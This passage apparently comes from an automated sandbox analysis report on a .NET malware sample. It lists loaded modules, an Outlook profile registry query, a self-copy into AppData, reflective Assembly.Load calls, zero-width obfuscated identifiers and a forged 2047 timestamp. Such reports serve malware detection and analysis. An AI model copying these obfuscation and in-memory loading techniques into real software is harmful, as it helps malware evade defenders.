                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: OtldpQxzAw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: OtldpQxzAw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: OtldpQxzAw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: RufU.pdbSHA256 source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.dr
                Source: Binary string: RufU.pdb source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.dr

                Data Obfuscation

                barindex
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs.Net Code: ehPZEGWR82 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.OtldpQxzAw.exe.36ba528.0.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs.Net Code: ehPZEGWR82 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs.Net Code: ehPZEGWR82 System.Reflection.Assembly.Load(byte[])
                Source: OtldpQxzAw.exeStatic PE information: 0x9277E7BE [Thu Nov 14 08:07:26 2047 UTC]
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06747750 push cs; ret 0_2_06747751
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D7750 push cs; ret 10_2_074D7751
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D35AF push cs; retf 10_2_074D360F
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CAE71D push FFFFFF8Bh; iretd 10_2_07CAE71F
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CAE622 push dword ptr [ebx+ebp-75h]; iretd 10_2_07CAE62D
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CA7997 push 14051E24h; retf 10_2_07CA79A5
                Source: OtldpQxzAw.exeStatic PE information: section name: .text entropy: 7.768214272073572
                Source: wiSeRRwvZHTk.exe.0.drStatic PE information: section name: .text entropy: 7.768214272073572
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, iyRDUvZ4Ql0hY9J1Nh.csHigh entropy of concatenated method names: 'mESwFoCwaG', 'HruwmCHidE', 'xGiwemkZMF', 'EK1wPJTA9V', 'g1xwl1FtAC', 'dgDwNrHT6F', 'I2F9WU7KGyqRK64IGA', 'zEaQrSaj7kklOROmcA', 'glZwwVI7go', 'mZxwJKk9Xe'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, su51c4wZKBuBe5J40Lx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yenWyijEIF', 'eIcWkCjpRx', 'JESWVuhe35', 'aD8WWGcH8l', 'stMWnb5bHo', 'oPTWIDXwM2', 'EadWcidb4O'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, dJ1kuKwwP91Iw7LtDF4.csHigh entropy of concatenated method names: 'rRXk6cumxq', 'QbHkzabe7T', 'Du2Vu78kDs', 'nrWVwgmmEJ', 'HB2Vbiuib0', 'vd2VJ2IseC', 'RyuVZhie2n', 'ueMVRY0jBb', 'lWNVqGvcTp', 'RZhVsROjIo'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, KUYvd8wJZPHjhsCd0KK.csHigh entropy of concatenated method names: 'ND2V6B4iGi', 'OgsVzPt8ov', 'obMWurWdVV', 'aqe4mZbXLIaHWFsoWVn', 'cBEx4MbYCpc7vqNtsSG', 'zVnB3FbSFo4iZA7Q8Ji', 'wX2kLcbIl1gfVqPvBCk', 'GIT8RIb2gjBaRpWfApT'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, L1onYL6owfuoodx0rs.csHigh entropy of concatenated method names: 'pDkkBaeFF6', 'S3HkSmMkNv', 'CbGkvi2Pr9', 'W6PkF48Kp6', 'iL1kyKYxbS', 'EWYkmArGe5', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, HyMjg377Jhn8qLwe5x.csHigh entropy of concatenated method names: 'IHHyQ9kJn7', 'DcWydlN5n1', 'WAiyLapob5', 'UUByoSiwv9', 'DCcyOE0cnO', 'zXfyHIZO7D', 'cZFyYR3ppV', 'i0OyC0TuKa', 'n4oyrlu54R', 'D37yGk2r0X'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, YMFwXZztGIHUqCTCse.csHigh entropy of concatenated method names: 'nAdkhksrbT', 'pXDkfKJCCn', 'b05k113SMI', 'CWPkQXabjN', 'XPQkdP3dsQ', 'e7ykoGGrCp', 'mLkkOg5QUm', 'lt3kc66cip', 'O7lk9snTVO', 'S3sk3sAbLF'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, QVhNaVwupe9wfSM2wEY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yujk8pbjEm', 'plGkxxooUT', 'Hy9kArCewl', 'UXnkpR4Z1x', 'jtPkKB5F9p', 'W1qk2hGXyn', 'i2vk0XJjdN'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, EIuit6pGcY0I90xR9d.csHigh entropy of concatenated method names: 'VJLlGX3Khy', 'm1Vlx1gIfv', 'f83lpUJpNa', 'oJnlKOYKX5', 'dCWld0cko7', 'R0NlLYIEmr', 'frLlo7H6YJ', 'ijdlO2l9QF', 'XNIlHicasU', 'cQDlYwoEmH'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, FWd2Tws8fJEwcpmeXS.csHigh entropy of concatenated method names: 'Dispose', 'w6jw78ZrSo', 'glabdLgX58', 'V2tIGPEwBT', 'rpEw6hVfce', 'frMwzy5y7C', 'ProcessDialogKey', 'XmdbuyMjg3', 'YJhbwn8qLw', 'l5xbbC1onY'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, TIKABW2vA20UYP6642.csHigh entropy of concatenated method names: 'ToString', 'EstN8mOyWe', 'LxZNdFyTjR', 'aK4NLuoVky', 'z76NoyixW5', 'COyNOTDyFN', 'TGZNHMZuw1', 'AieNYbPUtV', 'tt5NC439nb', 'dNfNr85Bvn'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, G6q7T6Yqbf9pkf5fm1.csHigh entropy of concatenated method names: 'cv9Fq6acq0', 'ISRFB2Es7n', 'NohFvY4Vqp', 'dtYv6qdQpe', 'Wj8vzMD60r', 'NciFuYOinW', 'bhIFwpPka1', 'vY3Fba7clr', 'nIFFJK4NFF', 'MNOFZw3Kw0'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, PS5LecrS9vdcv5KjVP.csHigh entropy of concatenated method names: 'E2kF9IWZch', 'Wk5F3pnCeM', 'ThaFEIbFnj', 'ic5FafpqdK', 'CtTFj7DW3a', 'iH4FhU27Mt', 'jjPFUmka4X', 'MOFFf3herb', 'RY5F17dUDj', 'IuEF5TodrP'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, mRLBHK09Fp3QY0ak7q.csHigh entropy of concatenated method names: 'MXx4e40rdN', 'ddW4PMMBbF', 'ToString', 'POY4qZasLI', 'eRb4sF31xZ', 'RPt4BmAHVU', 'EpH4SCGiTK', 'vPL4vpSFMD', 'Ya54FlJ7ge', 'FCG4m8Q00U'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.csHigh entropy of concatenated method names: 'e7dJRtBUgK', 'fCRJqCbo8G', 'jsjJshsc8B', 'cr7JBTgHe3', 'HdIJShxpXw', 'y8oJvAAiXn', 'XJ6JFkbdPj', 'OosJmuELmr', 'gYHJgfUh1y', 'notJeYhq6Y'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, xotDjBAXlboKjPaFnk.csHigh entropy of concatenated method names: 'L7FXfSn3B2', 'BFZX1Bvxxt', 'rOCXQA7TsI', 'XiLXd0hvP5', 'PtFXo5mOSr', 'IxTXOtU2og', 'jvPXYc3X2v', 'w8uXCDjtSc', 'hAfXG81djO', 'OagX8qB51r'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, ioCwaGfdruCHidE4Gk.csHigh entropy of concatenated method names: 'ro0sp3E7V1', 'PkcsKtEUdg', 'h7rs2aNFIY', 'WYKs0H3GOI', 'X95sMlgLTl', 'JfdsipJOe3', 'qylstQGCJe', 'K2bsDkAGbd', 'Girs72Nlqu', 'AYvs6SRV0V'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, qA9VZV5DCST9Ms1x1F.csHigh entropy of concatenated method names: 'qeJSjcpaiT', 'CnqSUKDPGw', 'FiUBLBenJ7', 's0xBon9xTy', 'hpMBONRZ8A', 'sGwBHvyxkd', 'wJEBYRgP74', 'NLYBCX9HJS', 'wHrBrYqUjn', 'fLpBGQeZoD'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, bm5CM2bmHEx5Y3Jyjk.csHigh entropy of concatenated method names: 'h8GEBEMld', 'HNUaUbEQ3', 'nXXh5Hn77', 'VVqUdp8Ne', 'B2q15tYO9', 'MKa5A4ZwC', 'TohCtIX6CiuV3JUgNe', 'Q9ljoVY9bqIJoeGmOu', 'kFrTY7TZZ', 'DM4kf1AAc'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, VACZgDQrHT6F0vZlW0.csHigh entropy of concatenated method names: 'IsGvRKFFJU', 'AYYvsqma45', 'mblvSaU2lk', 'myovFLHEEi', 'k7dvmrmMwf', 'dc6SMCnTFl', 'zcnSiouQWj', 'faeSt9baOa', 'oJcSDflilm', 'o8TS7vNoCb'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, xXXA4etICI6j8ZrSoT.csHigh entropy of concatenated method names: 'FTZyldmSgw', 'DXey4Y3I7S', 'Bgcyydlnmi', 'v1nyVUgmXG', 'sqWynZDn3i', 'mNMycgX90a', 'Dispose', 'pU8TqBL5DB', 'Ao1TsnYuYK', 'xkETBuC5Fi'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, JI1copiplbLsacxPHL.csHigh entropy of concatenated method names: 'Gx34DdI2qK', 'uni46rS3uf', 'wGATuDGcgn', 'gftTwkmGsG', 'DxG48eDkG1', 'mCE4xnatTy', 'y7j4AlvwU0', 'tE64pbk4Qo', 'zNa4KSKIul', 'IY542DbkfF'
                Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, fh8Df91GimkZMF1K1J.csHigh entropy of concatenated method names: 'QqkBanXbEM', 'gBIBhAFUsB', 'E1lBfyhTvq', 'OOGB1KDTMC', 'Fc3BlI35VY', 'olyBNfoS4o', 'eO8B47a1NS', 'euwBTAIHrh', 'sZMByj2XFx', 'EUYBk7LBdg'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, iyRDUvZ4Ql0hY9J1Nh.csHigh entropy of concatenated method names: 'mESwFoCwaG', 'HruwmCHidE', 'xGiwemkZMF', 'EK1wPJTA9V', 'g1xwl1FtAC', 'dgDwNrHT6F', 'I2F9WU7KGyqRK64IGA', 'zEaQrSaj7kklOROmcA', 'glZwwVI7go', 'mZxwJKk9Xe'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, su51c4wZKBuBe5J40Lx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yenWyijEIF', 'eIcWkCjpRx', 'JESWVuhe35', 'aD8WWGcH8l', 'stMWnb5bHo', 'oPTWIDXwM2', 'EadWcidb4O'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, dJ1kuKwwP91Iw7LtDF4.csHigh entropy of concatenated method names: 'rRXk6cumxq', 'QbHkzabe7T', 'Du2Vu78kDs', 'nrWVwgmmEJ', 'HB2Vbiuib0', 'vd2VJ2IseC', 'RyuVZhie2n', 'ueMVRY0jBb', 'lWNVqGvcTp', 'RZhVsROjIo'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, KUYvd8wJZPHjhsCd0KK.csHigh entropy of concatenated method names: 'ND2V6B4iGi', 'OgsVzPt8ov', 'obMWurWdVV', 'aqe4mZbXLIaHWFsoWVn', 'cBEx4MbYCpc7vqNtsSG', 'zVnB3FbSFo4iZA7Q8Ji', 'wX2kLcbIl1gfVqPvBCk', 'GIT8RIb2gjBaRpWfApT'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, L1onYL6owfuoodx0rs.csHigh entropy of concatenated method names: 'pDkkBaeFF6', 'S3HkSmMkNv', 'CbGkvi2Pr9', 'W6PkF48Kp6', 'iL1kyKYxbS', 'EWYkmArGe5', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, HyMjg377Jhn8qLwe5x.csHigh entropy of concatenated method names: 'IHHyQ9kJn7', 'DcWydlN5n1', 'WAiyLapob5', 'UUByoSiwv9', 'DCcyOE0cnO', 'zXfyHIZO7D', 'cZFyYR3ppV', 'i0OyC0TuKa', 'n4oyrlu54R', 'D37yGk2r0X'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, YMFwXZztGIHUqCTCse.csHigh entropy of concatenated method names: 'nAdkhksrbT', 'pXDkfKJCCn', 'b05k113SMI', 'CWPkQXabjN', 'XPQkdP3dsQ', 'e7ykoGGrCp', 'mLkkOg5QUm', 'lt3kc66cip', 'O7lk9snTVO', 'S3sk3sAbLF'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, QVhNaVwupe9wfSM2wEY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yujk8pbjEm', 'plGkxxooUT', 'Hy9kArCewl', 'UXnkpR4Z1x', 'jtPkKB5F9p', 'W1qk2hGXyn', 'i2vk0XJjdN'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, EIuit6pGcY0I90xR9d.csHigh entropy of concatenated method names: 'VJLlGX3Khy', 'm1Vlx1gIfv', 'f83lpUJpNa', 'oJnlKOYKX5', 'dCWld0cko7', 'R0NlLYIEmr', 'frLlo7H6YJ', 'ijdlO2l9QF', 'XNIlHicasU', 'cQDlYwoEmH'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, FWd2Tws8fJEwcpmeXS.csHigh entropy of concatenated method names: 'Dispose', 'w6jw78ZrSo', 'glabdLgX58', 'V2tIGPEwBT', 'rpEw6hVfce', 'frMwzy5y7C', 'ProcessDialogKey', 'XmdbuyMjg3', 'YJhbwn8qLw', 'l5xbbC1onY'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, TIKABW2vA20UYP6642.csHigh entropy of concatenated method names: 'ToString', 'EstN8mOyWe', 'LxZNdFyTjR', 'aK4NLuoVky', 'z76NoyixW5', 'COyNOTDyFN', 'TGZNHMZuw1', 'AieNYbPUtV', 'tt5NC439nb', 'dNfNr85Bvn'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, G6q7T6Yqbf9pkf5fm1.csHigh entropy of concatenated method names: 'cv9Fq6acq0', 'ISRFB2Es7n', 'NohFvY4Vqp', 'dtYv6qdQpe', 'Wj8vzMD60r', 'NciFuYOinW', 'bhIFwpPka1', 'vY3Fba7clr', 'nIFFJK4NFF', 'MNOFZw3Kw0'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, PS5LecrS9vdcv5KjVP.csHigh entropy of concatenated method names: 'E2kF9IWZch', 'Wk5F3pnCeM', 'ThaFEIbFnj', 'ic5FafpqdK', 'CtTFj7DW3a', 'iH4FhU27Mt', 'jjPFUmka4X', 'MOFFf3herb', 'RY5F17dUDj', 'IuEF5TodrP'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, mRLBHK09Fp3QY0ak7q.csHigh entropy of concatenated method names: 'MXx4e40rdN', 'ddW4PMMBbF', 'ToString', 'POY4qZasLI', 'eRb4sF31xZ', 'RPt4BmAHVU', 'EpH4SCGiTK', 'vPL4vpSFMD', 'Ya54FlJ7ge', 'FCG4m8Q00U'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.csHigh entropy of concatenated method names: 'e7dJRtBUgK', 'fCRJqCbo8G', 'jsjJshsc8B', 'cr7JBTgHe3', 'HdIJShxpXw', 'y8oJvAAiXn', 'XJ6JFkbdPj', 'OosJmuELmr', 'gYHJgfUh1y', 'notJeYhq6Y'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, xotDjBAXlboKjPaFnk.csHigh entropy of concatenated method names: 'L7FXfSn3B2', 'BFZX1Bvxxt', 'rOCXQA7TsI', 'XiLXd0hvP5', 'PtFXo5mOSr', 'IxTXOtU2og', 'jvPXYc3X2v', 'w8uXCDjtSc', 'hAfXG81djO', 'OagX8qB51r'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, ioCwaGfdruCHidE4Gk.csHigh entropy of concatenated method names: 'ro0sp3E7V1', 'PkcsKtEUdg', 'h7rs2aNFIY', 'WYKs0H3GOI', 'X95sMlgLTl', 'JfdsipJOe3', 'qylstQGCJe', 'K2bsDkAGbd', 'Girs72Nlqu', 'AYvs6SRV0V'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, qA9VZV5DCST9Ms1x1F.csHigh entropy of concatenated method names: 'qeJSjcpaiT', 'CnqSUKDPGw', 'FiUBLBenJ7', 's0xBon9xTy', 'hpMBONRZ8A', 'sGwBHvyxkd', 'wJEBYRgP74', 'NLYBCX9HJS', 'wHrBrYqUjn', 'fLpBGQeZoD'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, bm5CM2bmHEx5Y3Jyjk.csHigh entropy of concatenated method names: 'h8GEBEMld', 'HNUaUbEQ3', 'nXXh5Hn77', 'VVqUdp8Ne', 'B2q15tYO9', 'MKa5A4ZwC', 'TohCtIX6CiuV3JUgNe', 'Q9ljoVY9bqIJoeGmOu', 'kFrTY7TZZ', 'DM4kf1AAc'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, VACZgDQrHT6F0vZlW0.csHigh entropy of concatenated method names: 'IsGvRKFFJU', 'AYYvsqma45', 'mblvSaU2lk', 'myovFLHEEi', 'k7dvmrmMwf', 'dc6SMCnTFl', 'zcnSiouQWj', 'faeSt9baOa', 'oJcSDflilm', 'o8TS7vNoCb'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, xXXA4etICI6j8ZrSoT.csHigh entropy of concatenated method names: 'FTZyldmSgw', 'DXey4Y3I7S', 'Bgcyydlnmi', 'v1nyVUgmXG', 'sqWynZDn3i', 'mNMycgX90a', 'Dispose', 'pU8TqBL5DB', 'Ao1TsnYuYK', 'xkETBuC5Fi'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, JI1copiplbLsacxPHL.csHigh entropy of concatenated method names: 'Gx34DdI2qK', 'uni46rS3uf', 'wGATuDGcgn', 'gftTwkmGsG', 'DxG48eDkG1', 'mCE4xnatTy', 'y7j4AlvwU0', 'tE64pbk4Qo', 'zNa4KSKIul', 'IY542DbkfF'
                Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, fh8Df91GimkZMF1K1J.csHigh entropy of concatenated method names: 'QqkBanXbEM', 'gBIBhAFUsB', 'E1lBfyhTvq', 'OOGB1KDTMC', 'Fc3BlI35VY', 'olyBNfoS4o', 'eO8B47a1NS', 'euwBTAIHrh', 'sZMByj2XFx', 'EUYBk7LBdg'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, iyRDUvZ4Ql0hY9J1Nh.csHigh entropy of concatenated method names: 'mESwFoCwaG', 'HruwmCHidE', 'xGiwemkZMF', 'EK1wPJTA9V', 'g1xwl1FtAC', 'dgDwNrHT6F', 'I2F9WU7KGyqRK64IGA', 'zEaQrSaj7kklOROmcA', 'glZwwVI7go', 'mZxwJKk9Xe'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, su51c4wZKBuBe5J40Lx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yenWyijEIF', 'eIcWkCjpRx', 'JESWVuhe35', 'aD8WWGcH8l', 'stMWnb5bHo', 'oPTWIDXwM2', 'EadWcidb4O'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, dJ1kuKwwP91Iw7LtDF4.csHigh entropy of concatenated method names: 'rRXk6cumxq', 'QbHkzabe7T', 'Du2Vu78kDs', 'nrWVwgmmEJ', 'HB2Vbiuib0', 'vd2VJ2IseC', 'RyuVZhie2n', 'ueMVRY0jBb', 'lWNVqGvcTp', 'RZhVsROjIo'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, KUYvd8wJZPHjhsCd0KK.csHigh entropy of concatenated method names: 'ND2V6B4iGi', 'OgsVzPt8ov', 'obMWurWdVV', 'aqe4mZbXLIaHWFsoWVn', 'cBEx4MbYCpc7vqNtsSG', 'zVnB3FbSFo4iZA7Q8Ji', 'wX2kLcbIl1gfVqPvBCk', 'GIT8RIb2gjBaRpWfApT'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, L1onYL6owfuoodx0rs.csHigh entropy of concatenated method names: 'pDkkBaeFF6', 'S3HkSmMkNv', 'CbGkvi2Pr9', 'W6PkF48Kp6', 'iL1kyKYxbS', 'EWYkmArGe5', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, HyMjg377Jhn8qLwe5x.csHigh entropy of concatenated method names: 'IHHyQ9kJn7', 'DcWydlN5n1', 'WAiyLapob5', 'UUByoSiwv9', 'DCcyOE0cnO', 'zXfyHIZO7D', 'cZFyYR3ppV', 'i0OyC0TuKa', 'n4oyrlu54R', 'D37yGk2r0X'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, YMFwXZztGIHUqCTCse.csHigh entropy of concatenated method names: 'nAdkhksrbT', 'pXDkfKJCCn', 'b05k113SMI', 'CWPkQXabjN', 'XPQkdP3dsQ', 'e7ykoGGrCp', 'mLkkOg5QUm', 'lt3kc66cip', 'O7lk9snTVO', 'S3sk3sAbLF'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, QVhNaVwupe9wfSM2wEY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yujk8pbjEm', 'plGkxxooUT', 'Hy9kArCewl', 'UXnkpR4Z1x', 'jtPkKB5F9p', 'W1qk2hGXyn', 'i2vk0XJjdN'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, EIuit6pGcY0I90xR9d.csHigh entropy of concatenated method names: 'VJLlGX3Khy', 'm1Vlx1gIfv', 'f83lpUJpNa', 'oJnlKOYKX5', 'dCWld0cko7', 'R0NlLYIEmr', 'frLlo7H6YJ', 'ijdlO2l9QF', 'XNIlHicasU', 'cQDlYwoEmH'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, FWd2Tws8fJEwcpmeXS.csHigh entropy of concatenated method names: 'Dispose', 'w6jw78ZrSo', 'glabdLgX58', 'V2tIGPEwBT', 'rpEw6hVfce', 'frMwzy5y7C', 'ProcessDialogKey', 'XmdbuyMjg3', 'YJhbwn8qLw', 'l5xbbC1onY'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, TIKABW2vA20UYP6642.csHigh entropy of concatenated method names: 'ToString', 'EstN8mOyWe', 'LxZNdFyTjR', 'aK4NLuoVky', 'z76NoyixW5', 'COyNOTDyFN', 'TGZNHMZuw1', 'AieNYbPUtV', 'tt5NC439nb', 'dNfNr85Bvn'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, G6q7T6Yqbf9pkf5fm1.csHigh entropy of concatenated method names: 'cv9Fq6acq0', 'ISRFB2Es7n', 'NohFvY4Vqp', 'dtYv6qdQpe', 'Wj8vzMD60r', 'NciFuYOinW', 'bhIFwpPka1', 'vY3Fba7clr', 'nIFFJK4NFF', 'MNOFZw3Kw0'
                Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, PS5LecrS9vdcv5KjVP.csHigh entropy of concatenated method names: 'E2kF9IWZch', 'Wk5F3pnCeM', 'ThaFEIbFnj', 'ic5FafpqdK', 'CtTFj7DW3a', 'iH4FhU27Mt', 'jjPFUmka4X', 'MOFFf3herb', 'RY5F17dUDj', 'IuEF5TodrP'
